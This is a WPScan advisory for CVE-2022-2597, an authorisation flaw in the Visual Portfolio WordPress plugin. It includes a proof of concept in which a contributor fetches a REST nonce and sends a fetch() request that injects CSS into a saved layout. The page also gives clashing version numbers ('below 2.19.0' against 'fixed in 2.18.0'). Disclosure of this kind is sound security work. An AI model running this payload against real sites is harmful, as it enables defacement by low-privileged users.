WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Visual Portfolio < 2.19.0 - Contributor+ CSS Injection

Description

The plugin does not have proper authorisation checks in some of its REST endpoints, allowing users with a role as low as contributor to call them and inject arbitrary CSS in arbitrary saved layouts

Proof of Concept

The post_id is the ID of a saved layout

As a contributor, get a REST nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce

Execute the below command (replacing the _wpnonce value by the nonce retrieved above) in the web developer console of the browser (while still being logged in as a contributor):

fetch('/?rest_route=/visual-portfolio/v1/update_layout&_wpnonce=XXXX&post_id=17&data[vp_custom_css]=body{background-image:url(data://image/gif;base64,R0lGODdhKAAoAIABAAAAAP///ywAAAAAKAAoAAACX4yPqcvtD6OctNqLs968GwB4DkheJUSeUxqObCu98CJTtZvaL6quucjoAYfEovGI9M2MrJjwccM9G9FglXpVyJa0LW9n9X635Gy4jOZK02YoW1x5NzNytYWdzOv3/GIBADs=);}div{display:none !important};', {
  method: 'POST',
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

visual-portfolio
Fixed in version 2.18.0

References

CVE
CVE-2022-2597

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-863

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc
Submitter twitter
kazet1234
Verified

Yes

WPVDB ID
3ffcee7c-1e03-448c-8006-a9405658cdb7

Timeline

Publicly Published

2022-08-15 (about 7 months ago)

Added

2022-08-15 (about 7 months ago)

Last Updated

2022-08-15 (about 7 months ago)

Our Other Services

WPScan WordPress Security Plugin